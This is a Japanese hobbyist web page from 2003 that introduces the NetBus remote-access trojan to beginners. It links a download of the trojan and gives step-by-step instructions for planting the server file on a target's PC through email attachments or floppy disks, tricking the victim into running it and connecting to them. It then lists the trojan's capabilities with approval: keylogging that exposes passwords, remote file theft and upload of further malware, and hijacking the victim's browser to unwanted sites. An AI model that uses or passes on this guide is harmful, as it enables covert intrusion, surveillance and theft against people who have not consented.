トロイの木馬についての考察<NetBus編>

 

※ここでの操作説明等は超初心者向けに書いている物で、玄人の方にはかなり退屈かもしれませんがご了承ください。

 

私の書いたタグが間違っていなければ、いま背景には怪しげなアプリケーションウインドウが表示されていることでしょう。

これがトロイの木馬です。正確にいうと、トロイの一種「NetBus」です。

こいつが今回の題材になります。

「トロイってなんだ?」って初心者の方の為に一応説明すると、

トロイの木馬とは遠隔操作プログラムのことです。

トロイは基本的に「サーバーファイル」と「クライアントファイル」に別れており、

サーバーファイルを起動されたマシンはクライアント側から自由に操れてしまうのです。(説明下手でスミマセン)

アンチウイルスには検出され、なにかと悪者扱いされるトロイですが、

元はネットワーク管理用の善良なプログラムだったのですが、その強力な機能故に

悪用され、このような扱いをうけてしまうのです。

 

今回はこのトロイ達の優れた機能を一般に公開することにより、

セキュリティを高め、かつ厳しい評価をうけるトロイ達の無念を晴らそうという企画(?)なのです。

 

Netbus(トロイ)について (右上を見ながらどうぞ)


説明します。ここ(ダウンロード後はお手数ですが拡張子を「○○○.zi」から「○○○.zip」に変更してから、解凍してください。)から本体をダウンロードしてください。

解凍するとこのようなファイルが展開されます。(↓画像)

「サーバー」はPatch.exeです。(これを相手に仕込む)
「クライアント」はNetbus.exeです。(これで操作する)

1、まずはターゲットのPCにサーバーを入れる。メールの添付とか、
  FDとかに入れてやるといいです。チャンスをうかがって・・・。

2、何らかの方法でサーバーをダブルクリックさせ、常駐させる。

3、ターゲットのPCのIPアドレス、開いているポートを見つけ出す。
  IPリソルバ(ツール)なんかを使うといいです。
  検索エンジンで探してみてください。ポートはデフォルトのまま(12345)でいいと思われます。

4、クライアントを開き、見つけ出したIPアドレス、ポートを入力。CONNECTをクリックしてください(これで接続完了)。

5、つながったらあとはあとはじっくり料理。つながらないときには下にCouldn't connect to ○○(ターゲットのIPが入る)

 

         ++機能説明++

 〜各種ボタンの機能〜

「Server abmin」相手側のサーバーの管理(パスワード変更とかできちゃいます)。

「Open CD-ROM」CD-ROMドライブを開きます。

「Close CD-ROM」CD-ROMドライブを閉めます。「Open CD-ROM」を実行したときにのみ有効。

「Show imege」相手の画面に画像表示。保存も可能(GIF/JPGが可能)。

「Swap moise」マウスの左右クリックを逆にしてしまう。

「Start program」アプリケーションをスタートさせる。

「Msg manager」メッセージ対話マネージャー。相手にメッセージを送ることができる。
       日本語で書いて文字化けしても相手にはちゃんと表示されるのでご安心を♪

「Screendunp」相手のデスクトップの状況を画像で表示。いい感じです。ただし、ちょっと重たいかも。

「Get info」ホストコンピューターに関する情報を手に入れることができます。

「Port Redirect」もう一人のホストへのポートを転送する。

「Play sound」音を鳴らす(WAVのみ可能)。

「Exit Windows」相手のWindowsを終了(シャットダウン)させてしまう。

「Send text」活動中のアプリケーションウィンドウへキーストロークを送る。

「Active wnds」Windowsをフォーカスする。(詳しいことはよくわかりません)

「App Redirect」ポートへI/O制御再直結。

「Mouse pos」マウスの座標を指定して、固定できちゃいます。

「Listen」相手がキーボードで打った文字が全てダイレクトに見える。すごい。パスワードも丸見え。でも日本語対応してないです。

「Sound system」サウンドシステムマネージャー。

「Server setup」サーバーを形成する。

「Contorol mouse」マウスを操縦します。自分が動かしたものが直接相手にも反映されます。

「Go to URL」指定したURLに飛ばせます。いやーなとこにアクセスさせましょう。

「Key manager」こちらからキーボードを無効にします。「Disabal keys」は指定したキー、
       「Disabal all keys」は全てのキーを無効にする。「Restore all keys」で元に戻せます。

「File manager」リモートファイルマネージャー(ファイルを見る、ダウン・アップロード、削除)。
        最強の機能。新たなトロイ・ウイルスを送り込むこともできるし、
        重要ファイルをダウンロードすることもできる。サーバーを間違えて削除しないこと。


実際に試してみるとよいでしょう。自分のマシンに感染させ、別のところから操ってみては?
その機能のすごさに感動するでしょう。

また、その他のトロイはUGTOOLの方にまとめてありますので、是非ご利用を♪

ちなみに「NetBus」はかなり有名なトロイですのでアンチウイルスソフトにばっちり検出されます。

無断転載は禁止にしてみます。引用のみ可ってことで。

(2003/08/07 by 黒鏡)

 

なんとなくこの研究はおもしろいのでシリーズ物(?)にしようかと思ってます。